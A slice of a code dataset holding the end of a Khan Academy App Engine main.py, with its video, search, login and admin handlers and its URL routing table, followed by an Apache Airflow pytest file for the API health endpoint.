the context of a particular playlist.\n # To do that we first need to find the appropriate playlist. If we aren't\n # given the playlist title in a query param, we need to find a playlist that\n # the video is a part of. That requires finding the video, given it readable_id\n # or, to support old URLs, it's youtube_id.\n video = None\n playlist = None\n video_id = self.request.get('v')\n playlist_title = self.request_string('playlist', default=\"\") or self.request_string('p', default=\"\")\n\n readable_id = urllib.unquote(readable_id)\n readable_id = re.sub('-+$', '', readable_id) # remove any trailing dashes (see issue 1140)\n\n # If either the readable_id or playlist title is missing,\n # redirect to the canonical URL that contains them\n redirect_to_canonical_url = False\n if video_id: # Support for old links\n query = Video.all()\n query.filter('youtube_id =', video_id)\n video = query.get()\n\n if not video:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n readable_id = video.readable_id\n playlist = video.first_playlist()\n\n if not playlist:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n redirect_to_canonical_url = True\n\n if playlist_title is not None and len(playlist_title) > 0:\n query = Playlist.all().filter('title =', playlist_title)\n key_id = 0\n for p in query:\n if p.key().id() > key_id and not p.youtube_id.endswith('_player'):\n playlist = p\n key_id = p.key().id()\n\n # If a playlist_title wasn't specified or the specified playlist wasn't found\n # use the first playlist for the requested video.\n if playlist is None:\n # Get video by readable_id just to get the first playlist for the video\n video = Video.get_for_readable_id(readable_id)\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n playlist = video.first_playlist()\n if not playlist:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n redirect_to_canonical_url = True\n\n exid = self.request_string('exid', default=None)\n\n if redirect_to_canonical_url:\n qs = {'playlist': playlist.title}\n if exid:\n qs['exid'] = exid\n\n urlpath = \"/video/%s\" % urllib.quote(readable_id)\n url = urlparse.urlunparse(('', '', urlpath, '', urllib.urlencode(qs), ''))\n self.redirect(url, True)\n return\n\n # If we got here, we have a readable_id and a playlist_title, so we can display\n # the playlist and the video in it that has the readable_id. Note that we don't\n # query the Video entities for one with the requested readable_id because in some\n # cases there are multiple Video objects in the datastore with the same readable_id\n # (e.g. there are 2 \"Order of Operations\" videos).\n\n videos = VideoPlaylist.get_cached_videos_for_playlist(playlist)\n previous_video = None\n next_video = None\n for v in videos:\n if v.readable_id == readable_id:\n v.selected = 'selected'\n video = v\n elif video is None:\n previous_video = v\n elif next_video is None:\n next_video = v\n\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n if App.offline_mode:\n video_path = \"/videos/\" + get_mangled_playlist_name(playlist_title) + \"/\" + video.readable_id + \".flv\"\n else:\n video_path = video.download_video_url()\n\n if video.description == video.title:\n video.description = None\n\n related_exercises = video.related_exercises()\n button_top_exercise = None\n if related_exercises:\n def ex_to_dict(exercise):\n return {\n 'name': exercise.display_name,\n 'url': exercise.relative_url,\n }\n button_top_exercise = ex_to_dict(related_exercises[0])\n\n user_video = UserVideo.get_for_video_and_user_data(video, UserData.current(), insert_if_missing=True)\n\n awarded_points = 0\n if user_video:\n awarded_points = user_video.points\n\n template_values = {\n 'playlist': playlist,\n 'video': video,\n 'videos': videos,\n 'video_path': video_path,\n 'video_points_base': consts.VIDEO_POINTS_BASE,\n 'button_top_exercise': button_top_exercise,\n 'related_exercises': [], # disabled for now\n 'previous_video': previous_video,\n 'next_video': next_video,\n 'selected_nav_link': 'watch',\n 'awarded_points': awarded_points,\n 'issue_labels': ('Component-Videos,Video-%s' % readable_id),\n 'author_profile': 'https://plus.google.com/103970106103092409324'\n }\n template_values = qa.add_template_values(template_values, self.request)\n\n bingo(['struggling_videos_landing',\n 'homepage_restructure_videos_landing'])\n self.render_jinja2_template('viewvideo.html', template_values)\n\nclass ReportIssue(request_handler.RequestHandler):\n\n def get(self):\n issue_type = self.request.get('type')\n self.write_response(issue_type, {'issue_labels': self.request.get('issue_labels'),})\n\n def write_response(self, issue_type, extra_template_values):\n user_agent = self.request.headers.get('User-Agent')\n if user_agent is None:\n user_agent = ''\n user_agent = user_agent.replace(',',';') # Commas delimit labels, so we don't want them\n template_values = {\n 'referer': self.request.headers.get('Referer'),\n 'user_agent': user_agent,\n }\n template_values.update(extra_template_values)\n page = 'reportissue_template.html'\n if issue_type == 'Defect':\n page = 'reportproblem.html'\n elif issue_type == 'Enhancement':\n page = 'makesuggestion.html'\n elif issue_type == 'New-Video':\n page = 'requestvideo.html'\n elif issue_type == 'Comment':\n page = 'makecomment.html'\n elif issue_type == 'Question':\n page = 'askquestion.html'\n\n self.render_jinja2_template(page, template_values)\n\nclass Crash(request_handler.RequestHandler):\n def get(self):\n if self.request_bool(\"capability_disabled\", default=False):\n raise CapabilityDisabledError(\"Simulate scheduled GAE downtime\")\n else:\n # Even Watson isn't perfect\n raise Exception(\"What is Toronto?\")\n\nclass ReadOnlyDowntime(request_handler.RequestHandler):\n def get(self):\n raise CapabilityDisabledError(\"App Engine maintenance period\")\n\n def post(self):\n return self.get()\n\nclass SendToLog(request_handler.RequestHandler):\n def post(self):\n message = self.request_string(\"message\", default=\"\")\n if message:\n logging.critical(\"Manually sent to log: %s\" % message)\n\nclass MobileFullSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(True)\n self.redirect(\"/\")\n\nclass MobileSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(False)\n self.redirect(\"/\")\n\nclass ViewFAQ(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/about/faq\", True)\n return\n\nclass ViewGetInvolved(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewContribute(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('contribute.html', {\"selected_nav_link\": \"contribute\"})\n\nclass ViewCredits(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('viewcredits.html', {\"selected_nav_link\": \"contribute\"})\n\nclass Donate(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewTOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('tos.html', {\"selected_nav_link\": \"tos\"})\n\nclass ViewAPITOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('api-tos.html', {\"selected_nav_link\": \"api-tos\"})\n\nclass ViewPrivacyPolicy(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('privacy-policy.html', {\"selected_nav_link\": \"privacy-policy\"})\n\nclass ViewDMCA(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('dmca.html', {\"selected_nav_link\": \"dmca\"})\n\nclass ViewSAT(request_handler.RequestHandler):\n\n def get(self):\n playlist_title = \"SAT Preparation\"\n query = Playlist.all()\n query.filter('title =', playlist_title)\n playlist = query.get()\n query = VideoPlaylist.all()\n query.filter('playlist =', playlist)\n query.filter('live_association = ', True) #need to change this to true once I'm done with all of my hacks\n query.order('video_position')\n playlist_videos = query.fetch(500)\n\n template_values = {\n 'videos': playlist_videos,\n }\n\n self.render_jinja2_template('sat.html', template_values)\n\nclass ViewGMAT(request_handler.RequestHandler):\n\n def get(self):\n problem_solving = VideoPlaylist.get_query_for_playlist_title(\"GMAT: Problem Solving\")\n data_sufficiency = VideoPlaylist.get_query_for_playlist_title(\"GMAT Data Sufficiency\")\n template_values = {\n 'data_sufficiency': data_sufficiency,\n 'problem_solving': problem_solving,\n }\n\n self.render_jinja2_template('gmat.html', template_values)\n\n\nclass RetargetFeedback(bulk_update.handler.UpdateKind):\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n return db.GqlQuery('select __key__ from Feedback')\n\n def use_transaction(self):\n return False\n\n def update(self, feedback):\n orig_video = feedback.video()\n\n if orig_video == None or type(orig_video).__name__ != \"Video\":\n return False\n readable_id = orig_video.readable_id\n query = Video.all()\n query.filter('readable_id =', readable_id)\n # The database currently contains multiple Video objects for a particular\n # video. Some are old. Some are due to a YouTube sync where the youtube urls\n # changed and our code was producing youtube_ids that ended with '_player'.\n # This hack gets the most recent valid Video object.\n key_id = 0\n for v in query:\n if v.key().id() > key_id and not v.youtube_id.endswith('_player'):\n video = v\n key_id = v.key().id()\n # End of hack\n if video is not None and video.key() != orig_video.key():\n logging.info(\"Retargeting Feedback %s from Video %s to Video %s\", feedback.key().id(), orig_video.key().id(), video.key().id())\n feedback.targets[0] = video.key()\n return True\n else:\n return False\n\nclass ChangeEmail(bulk_update.handler.UpdateKind):\n\n def get_email_params(self):\n old_email = self.request.get('old')\n new_email = self.request.get('new')\n prop = self.request.get('prop')\n if old_email is None or len(old_email) == 0:\n raise Exception(\"parameter 'old' is required\")\n if new_email is None or len(new_email) == 0:\n new_email = old_email\n if prop is None or len(prop) == 0:\n prop = \"user\"\n return (old_email, new_email, prop)\n\n def get(self):\n (old_email, new_email, prop) = self.get_email_params()\n if new_email == old_email:\n return bulk_update.handler.UpdateKind.get(self)\n self.response.out.write(\"To prevent a CSRF attack from changing email addresses, you initiate an email address change from the browser. \")\n self.response.out.write(\"Instead, run the following from remote_api_shell.py.
and then check the logs in the admin console\")\n\n\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n\n (old_email, new_email, prop) = self.get_email_params()\n # When a user's personal Google account is replaced by their transitioned Google Apps account with the same email,\n # the Google user ID changes and the new User object's are not considered equal to the old User object's with the same\n # email, so querying the datastore for entities referring to users with the same email return nothing. However an inequality\n # query will return the relevant entities.\n gt_user = users.User(old_email[:-1] + chr(ord(old_email[-1])-1) + chr(127))\n lt_user = users.User(old_email + chr(0))\n return db.GqlQuery(('select __key__ from %s where %s > :1 and %s < :2' % (kind, prop, prop)), gt_user, lt_user)\n\n def use_transaction(self):\n return False\n\n def update(self, entity):\n (old_email, new_email, prop) = self.get_email_params()\n if getattr(entity, prop).email() != old_email:\n # This should never occur, but just in case, don't change or reput the entity.\n return False\n setattr(entity, prop, users.User(new_email))\n return True\n\nclass Login(request_handler.RequestHandler):\n def get(self):\n return self.post()\n\n def post(self):\n cont = self.request_string('continue', default = \"/\")\n direct = self.request_bool('direct', default = False)\n\n openid_identifier = self.request.get('openid_identifier')\n if openid_identifier is not None and len(openid_identifier) > 0:\n if App.accepts_openid:\n self.redirect(users.create_login_url(cont, federated_identity = openid_identifier))\n return\n self.redirect(users.create_login_url(cont))\n return\n\n if App.facebook_app_secret is None:\n self.redirect(users.create_login_url(cont))\n return\n template_values = {\n 'continue': cont,\n 'direct': direct\n }\n self.render_jinja2_template('login.html', template_values)\n\nclass MobileOAuthLogin(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('login_mobile_oauth.html', {\n \"oauth_map_id\": self.request_string(\"oauth_map_id\", default=\"\"),\n \"anointed\": self.request_bool(\"an\", default=False),\n \"view\": self.request_string(\"view\", default=\"\")\n })\n\nclass PostLogin(request_handler.RequestHandler):\n def get(self):\n cont = self.request_string('continue', default = \"/\")\n\n # Immediately after login we make sure this user has a UserData entity\n user_data = UserData.current()\n if user_data:\n\n # Update email address if it has changed\n current_google_user = users.get_current_user()\n if current_google_user and current_google_user.email() != user_data.email:\n user_data.user_email = current_google_user.email()\n user_data.put()\n\n # Update nickname if it has changed\n current_nickname = get_nickname_for(user_data)\n if user_data.user_nickname != current_nickname:\n user_data.user_nickname = current_nickname\n user_data.put()\n\n # Set developer and moderator to True if user is admin\n if (not user_data.developer or not user_data.moderator) and users.is_current_user_admin():\n user_data.developer = True\n user_data.moderator = True\n user_data.put()\n\n # If user is brand new and has 0 points, migrate data\n phantom_id = get_phantom_user_id_from_cookies()\n if phantom_id:\n phantom_data = UserData.get_from_db_key_email(phantom_id)\n\n # First make sure user has 0 points and phantom user has some activity\n if user_data.points == 0 and phantom_data and phantom_data.points > 0:\n\n # Make sure user has no students\n if not user_data.has_students():\n\n # Clear all \"login\" notifications\n UserNotifier.clear_all(phantom_data)\n\n # Update phantom user_data to real user_data\n phantom_data.user_id = user_data.user_id\n phantom_data.current_user = user_data.current_user\n phantom_data.user_email = user_data.user_email\n phantom_data.user_nickname = user_data.user_nickname\n\n if phantom_data.put():\n # Phantom user was just transitioned to real user\n user_counter.add(1)\n user_data.delete()\n\n cont = \"/newaccount?continue=%s\" % cont\n else:\n\n # If nobody is logged in, clear any expired Facebook cookie that may be hanging around.\n self.delete_cookie(\"fbsr_\" + App.facebook_app_id)\n self.delete_cookie(\"fbs_\" + App.facebook_app_id)\n\n logging.critical(\"Missing UserData during PostLogin, with id: %s, cookies: (%s), google user: %s\" % (\n util.get_current_user_id(), os.environ.get('HTTP_COOKIE', ''), users.get_current_user()\n )\n )\n\n # Always delete phantom user cookies on login\n self.delete_cookie('ureg_id')\n\n self.redirect(cont)\n\nclass Logout(request_handler.RequestHandler):\n def get(self):\n self.delete_cookie('ureg_id')\n self.redirect(users.create_logout_url(self.request_string(\"continue\", default=\"/\")))\n\nclass Search(request_handler.RequestHandler):\n\n def get(self):\n query = self.request.get('page_search_query')\n template_values = {'page_search_query': query}\n query = query.strip()\n if len(query) < search.SEARCH_PHRASE_MIN_LENGTH:\n if len(query) > 0:\n template_values.update({\n 'query_too_short': search.SEARCH_PHRASE_MIN_LENGTH\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n return\n searched_phrases = []\n\n # Do an async query for all ExerciseVideos, since this may be slow\n exvids_query = ExerciseVideo.all()\n exvids_future = util.async_queries([exvids_query])\n\n # One full (non-partial) search, then sort by kind\n all_text_keys = Playlist.full_text_search(\n query, limit=50, kind=None,\n stemming=Playlist.INDEX_STEMMING,\n multi_word_literal=Playlist.INDEX_MULTI_WORD,\n searched_phrases_out=searched_phrases)\n\n\n # Quick title-only partial search\n playlist_partial_results = filter(\n lambda playlist_dict: query in playlist_dict[\"title\"].lower(),\n autocomplete.playlist_title_dicts())\n video_partial_results = filter(\n lambda video_dict: query in video_dict[\"title\"].lower(),\n autocomplete.video_title_dicts())\n\n # Combine results & do one big get!\n all_key_list = [str(key_and_title[0]) for key_and_title in all_text_keys]\n #all_key_list.extend([result[\"key\"] for result in playlist_partial_results])\n all_key_list.extend([result[\"key\"] for result in video_partial_results])\n all_key_list = list(set(all_key_list))\n all_entities = db.get(all_key_list)\n\n # Filter results by type\n playlists = []\n videos = []\n for entity in all_entities:\n if isinstance(entity, Playlist):\n playlists.append(entity)\n elif isinstance(entity, Video):\n videos.append(entity)\n elif entity is not None:\n logging.error(\"Unhandled kind in search results: \" +\n str(type(entity)))\n\n playlist_count = len(playlists)\n\n # Get playlists for videos not in matching playlists\n filtered_videos = []\n filtered_videos_by_key = {}\n for video in videos:\n if [(playlist.title in video.playlists) for playlist in playlists].count(True) == 0:\n video_playlist = video.first_playlist()\n if video_playlist != None:\n playlists.append(video_playlist)\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n else:\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n video_count = len(filtered_videos)\n\n # Get the related exercises\n all_exercise_videos = exvids_future[0].get_result()\n exercise_keys = []\n for exvid in all_exercise_videos:\n video_key = str(ExerciseVideo.video.get_value_for_datastore(exvid))\n if video_key in filtered_videos_by_key:\n exercise_key = ExerciseVideo.exercise.get_value_for_datastore(exvid)\n video_exercise_keys = filtered_videos_by_key[video_key]\n video_exercise_keys.append(exercise_key)\n exercise_keys.append(exercise_key)\n exercises = db.get(exercise_keys)\n\n # Sort exercises with videos\n video_exercises = {}\n for video_key, exercise_keys in filtered_videos_by_key.iteritems():\n video_exercises[video_key] = map(lambda exkey: [exercise for exercise in exercises if exercise.key() == exkey][0], exercise_keys)\n\n # Count number of videos in each playlist and sort descending\n for playlist in playlists:\n if len(filtered_videos) > 0:\n playlist.match_count = [(playlist.title in video.playlists) for video in filtered_videos].count(True)\n else:\n playlist.match_count = 0\n playlists = sorted(playlists, key=lambda playlist: -playlist.match_count)\n\n template_values.update({\n 'playlists': playlists,\n 'videos': filtered_videos,\n 'video_exercises': video_exercises,\n 'search_string': query,\n 'video_count': video_count,\n 'playlist_count': playlist_count,\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n\nclass RedirectToJobvite(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"http://hire.jobvite.com/CompanyJobs/Careers.aspx?k=JobListing&c=qd69Vfw7\")\n\nclass RedirectToToolkit(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"https://sites.google.com/a/khanacademy.org/schools/\")\n\nclass PermanentRedirectToHome(request_handler.RequestHandler):\n def get(self):\n\n redirect_target = \"/\"\n relative_path = self.request.path.rpartition('/')[2].lower()\n\n # Permanently redirect old JSP version of the site to home\n # or, in the case of some special targets, to their appropriate new URL\n dict_redirects = {\n \"sat.jsp\": \"/sat\",\n \"gmat.jsp\": \"/gmat\",\n }\n\n if dict_redirects.has_key(relative_path):\n redirect_target = dict_redirects[relative_path]\n\n self.redirect(redirect_target, True)\n\nclass ServeUserVideoCss(request_handler.RequestHandler):\n def get(self):\n user_data = UserData.current()\n if user_data == None:\n return\n\n user_video_css = models.UserVideoCss.get_for_user_data(user_data)\n self.response.headers['Content-Type'] = 'text/css'\n\n if user_video_css.version == user_data.uservideocss_version:\n # Don't cache if there's a version mismatch and update isn't finished\n self.response.headers['Cache-Control'] = 'public,max-age=1000000'\n\n self.response.out.write(user_video_css.video_css)\n\nclass RealtimeEntityCount(request_handler.RequestHandler):\n def get(self):\n if not App.is_dev_server:\n raise Exception(\"Only works on dev servers.\")\n default_kinds = 'Exercise'\n kinds = self.request_string(\"kinds\", default_kinds).split(',')\n for kind in kinds:\n count = getattr(models, kind).all().count(10000)\n self.response.out.write(\"%s: %d \" % (kind, count))\n\napplicationSmartHistory = webapp2.WSGIApplication([\n ('/.*', smarthistory.SmartHistoryProxy)\n])\n\napplication = webapp2.WSGIApplication([\n ('/', homepage.ViewHomePage),\n ('/about', util_about.ViewAbout),\n ('/about/blog', blog.ViewBlog),\n ('/about/blog/.*', blog.ViewBlogPost),\n ('/about/the-team', util_about.ViewAboutTheTeam),\n ('/about/getting-started', util_about.ViewGettingStarted),\n ('/about/tos', ViewTOS ),\n ('/about/api-tos', ViewAPITOS),\n ('/about/privacy-policy', ViewPrivacyPolicy ),\n ('/about/dmca', ViewDMCA ),\n ('/contribute', ViewContribute ),\n ('/contribute/credits', ViewCredits ),\n ('/frequently-asked-questions', util_about.ViewFAQ),\n ('/about/faq', util_about.ViewFAQ),\n ('/downloads', util_about.ViewDownloads),\n ('/about/downloads', util_about.ViewDownloads),\n ('/getinvolved', ViewGetInvolved),\n ('/donate', Donate),\n ('/exercisedashboard', exercises.ViewAllExercises),\n\n # Issues a command to re-generate the library content.\n ('/library_content', library.GenerateLibraryContent),\n\n ('/exercise/(.+)', exercises.ViewExercise), # /exercises/addition_1\n ('/exercises', exercises.ViewExercise), # This old /exercises?exid=addition_1 URL pattern is deprecated\n ('/review', exercises.ViewExercise),\n\n ('/khan-exercises/exercises/.*', exercises.RawExercise),\n ('/viewexercisesonmap', exercises.ViewAllExercises),\n ('/editexercise', exercises.EditExercise),\n ('/updateexercise', exercises.UpdateExercise),\n ('/moveexercisemapnodes', exercises.MoveMapNodes),\n ('/admin94040', exercises.ExerciseAdmin),\n ('/video/(.*)', ViewVideo),\n ('/v/(.*)', ViewVideo),\n ('/video', ViewVideo), # Backwards URL compatibility\n ('/sat', ViewSAT),\n ('/gmat', ViewGMAT),\n ('/reportissue', ReportIssue),\n ('/search', Search),\n ('/savemapcoords', knowledgemap.SaveMapCoords),\n ('/saveexpandedallexercises', knowledgemap.SaveExpandedAllExercises),\n ('/crash', Crash),\n\n ('/image_cache/(.+)', ImageCache),\n\n ('/mobilefullsite', MobileFullSite),\n ('/mobilesite', MobileSite),\n\n ('/admin/reput', bulk_update.handler.UpdateKind),\n ('/admin/retargetfeedback', RetargetFeedback),\n ('/admin/startnewbadgemapreduce', util_badges.StartNewBadgeMapReduce),\n ('/admin/badgestatistics', util_badges.BadgeStatistics),\n ('/admin/startnewexercisestatisticsmapreduce', exercise_statistics.StartNewExerciseStatisticsMapReduce),\n ('/admin/startnewvotemapreduce', voting.StartNewVoteMapReduce),\n ('/admin/feedbackflagupdate', qa.StartNewFlagUpdateMapReduce),\n ('/admin/dailyactivitylog', activity_summary.StartNewDailyActivityLogMapReduce),\n ('/admin/youtubesync.*', youtube_sync.YouTubeSync),\n ('/admin/changeemail', ChangeEmail),\n ('/admin/realtimeentitycount', RealtimeEntityCount),\n\n ('/devadmin/emailchange', devpanel.Email),\n ('/devadmin/managedevs', devpanel.Manage),\n ('/devadmin/managecoworkers', devpanel.ManageCoworkers),\n ('/devadmin/commoncore', devpanel.CommonCore),\n\n ('/coaches', coaches.ViewCoaches),\n ('/students', coaches.ViewStudents),\n ('/registercoach', coaches.RegisterCoach),\n ('/unregistercoach', coaches.UnregisterCoach),\n ('/unregisterstudent', coaches.UnregisterStudent),\n ('/requeststudent', coaches.RequestStudent),\n ('/acceptcoach', coaches.AcceptCoach),\n\n ('/createstudentlist', coaches.CreateStudentList),\n ('/deletestudentlist', coaches.DeleteStudentList),\n ('/removestudentfromlist', coaches.RemoveStudentFromList),\n ('/addstudenttolist', coaches.AddStudentToList),\n\n ('/individualreport', coaches.ViewIndividualReport),\n ('/progresschart', coaches.ViewProgressChart),\n ('/sharedpoints', coaches.ViewSharedPoints),\n ('/classreport', coaches.ViewClassReport),\n ('/classtime', coaches.ViewClassTime),\n ('/charts', coaches.ViewCharts),\n\n ('/mailing-lists/subscribe', util_mailing_lists.Subscribe),\n\n ('/profile/graph/activity', util_profile.ActivityGraph),\n ('/profile/graph/focus', util_profile.FocusGraph),\n ('/profile/graph/exercisesovertime', util_profile.ExercisesOverTimeGraph),\n ('/profile/graph/exerciseproblems', util_profile.ExerciseProblemsGraph),\n ('/profile/graph/exerciseprogress', util_profile.ExerciseProgressGraph),\n ('/profile', util_profile.ViewProfile),\n\n ('/profile/graph/classexercisesovertime', util_profile.ClassExercisesOverTimeGraph),\n ('/profile/graph/classenergypointsperminute', util_profile.ClassEnergyPointsPerMinuteGraph),\n ('/profile/graph/classtime', util_profile.ClassTimeGraph),\n ('/class_profile', util_profile.ViewClassProfile),\n\n ('/login', Login),\n ('/login/mobileoauth', MobileOAuthLogin),\n ('/postlogin', PostLogin),\n ('/logout', Logout),\n\n ('/api-apps/register', oauth_apps.Register),\n\n # These are dangerous, should be able to clean things manually from the remote python shell\n\n ('/deletevideoplaylists', DeleteVideoPlaylists),\n ('/killliveassociations', KillLiveAssociations),\n\n # Below are all discussion related pages\n ('/discussion/addcomment', comments.AddComment),\n ('/discussion/pagecomments', comments.PageComments),\n\n ('/discussion/addquestion', qa.AddQuestion),\n ('/discussion/expandquestion', qa.ExpandQuestion),\n ('/discussion/addanswer', qa.AddAnswer),\n ('/discussion/editentity', qa.EditEntity),\n ('/discussion/answers', qa.Answers),\n ('/discussion/pagequestions', qa.PageQuestions),\n ('/discussion/clearflags', qa.ClearFlags),\n ('/discussion/flagentity', qa.FlagEntity),\n ('/discussion/voteentity', voting.VoteEntity),\n ('/discussion/updateqasort', voting.UpdateQASort),\n ('/admin/discussion/finishvoteentity', voting.FinishVoteEntity),\n ('/discussion/deleteentity', qa.DeleteEntity),\n ('/discussion/changeentitytype', qa.ChangeEntityType),\n ('/discussion/videofeedbacknotificationlist', notification.VideoFeedbackNotificationList),\n ('/discussion/videofeedbacknotificationfeed', notification.VideoFeedbackNotificationFeed),\n ('/discussion/moderatorlist', qa.ModeratorList),\n ('/discussion/flaggedfeedback', qa.FlaggedFeedback),\n\n ('/githubpost', github.NewPost),\n ('/githubcomment', github.NewComment),\n\n ('/toolkit', RedirectToToolkit),\n\n ('/paypal/ipn', paypal.IPN),\n\n ('/badges/view', util_badges.ViewBadges),\n ('/badges/custom/create', custom_badges.CreateCustomBadge),\n ('/badges/custom/award', custom_badges.AwardCustomBadge),\n\n ('/notifierclose', util_notify.ToggleNotify),\n ('/newaccount', Clone),\n\n ('/jobs', RedirectToJobvite),\n ('/jobs/.*', RedirectToJobvite),\n\n ('/dashboard', dashboard.Dashboard),\n ('/contentdash', dashboard.ContentDashboard),\n ('/admin/dashboard/record_statistics', dashboard.RecordStatistics),\n ('/admin/entitycounts', dashboard.EntityCounts),\n\n ('/sendtolog', SendToLog),\n\n ('/user_video_css', ServeUserVideoCss),\n\n ('/admin/exercisestats/collectfancyexercisestatistics', exercisestats.CollectFancyExerciseStatistics),\n ('/exercisestats/report', exercisestats.report.Test),\n ('/exercisestats/exerciseovertime', exercisestats.report_json.ExerciseOverTimeGraph),\n ('/exercisestats/geckoboardexerciseredirect', exercisestats.report_json.GeckoboardExerciseRedirect),\n ('/exercisestats/exercisestatsmap', exercisestats.report_json.ExerciseStatsMapGraph),\n ('/exercisestats/exerciseslastauthorcounter', exercisestats.report_json.ExercisesLastAuthorCounter),\n ('/exercisestats/exercisenumbertrivia', exercisestats.report_json.ExerciseNumberTrivia),\n ('/exercisestats/userlocationsmap', exercisestats.report_json.UserLocationsMap),\n ('/exercisestats/exercisescreatedhistogram', exercisestats.report_json.ExercisesCreatedHistogram),\n\n ('/goals/new', goals.handlers.CreateNewGoal),\n ('/goals/admincreaterandom', goals.handlers.CreateRandomGoalData),\n\n ('/robots.txt', robots.RobotsTxt),\n\n ('/r/.*', redirects.Redirect),\n ('/redirects', redirects.List),\n ('/redirects/add', redirects.Add),\n ('/redirects/remove', redirects.Remove),\n\n # Redirect any links to old JSP version\n ('/.*\\.jsp', PermanentRedirectToHome),\n ('/index\\contribute', PermanentRedirectToHome),\n\n ('/_ah/warmup.*', warmup.Warmup),\n\n # -- KHAN-NL -----------------------------------\n ('/nl-content/.*', nl.Content),\n ('/nl_report', nl_report.BugReporter),\n\t('/helpmee', nl.LinkerHelpmee),\n\n ], debug=True)\n\napplication = profiler.ProfilerWSGIMiddleware(application)\napplication = GAEBingoWSGIMiddleware(application)\napplication = request_cache.RequestCacheMiddleware(application)\n\ndef main():\n if os.environ[\"SERVER_NAME\"] == \"smarthistory.khanacademy.org\":\n run_wsgi_app(applicationSmartHistory)\n else:\n run_wsgi_app(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"KhanWorld/KhanAcademy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":37707,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"}
+{"seq_id":"32682330613","text":"from __future__ import annotations\n\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow.jobs.job import Job\nfrom airflow.jobs.scheduler_job_runner import SchedulerJobRunner\nfrom airflow.utils import timezone\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\n\nHEALTHY = \"healthy\"\nUNHEALTHY = \"unhealthy\"\n\n\nclass TestHealthTestBase:\n @pytest.fixture(autouse=True)\n def setup_attrs(self, minimal_app_for_api) -> None:\n self.app = minimal_app_for_api\n self.client = self.app.test_client() # type:ignore\n with create_session() as session:\n session.query(Job).delete()\n\n def teardown_method(self):\n with create_session() as session:\n session.query(Job).delete()\n\n\nclass TestGetHealth(TestHealthTestBase):\n @provide_session\n def test_healthy_scheduler_status(self, session):\n last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_1)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"healthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_1.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n @provide_session\n def test_unhealthy_scheduler_is_slow(self, session):\n last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_2)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_2.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n def test_unhealthy_scheduler_no_job(self):\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n\n @mock.patch.object(SchedulerJobRunner, \"most_recent_job\")\n def test_unhealthy_metadatabase_status(self, most_recent_job_mock):\n most_recent_job_mock.side_effect = Exception\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"unhealthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n","repo_name":"a0x8o/airflow","sub_path":"tests/api_connexion/endpoints/test_health_endpoint.py","file_name":"test_health_endpoint.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
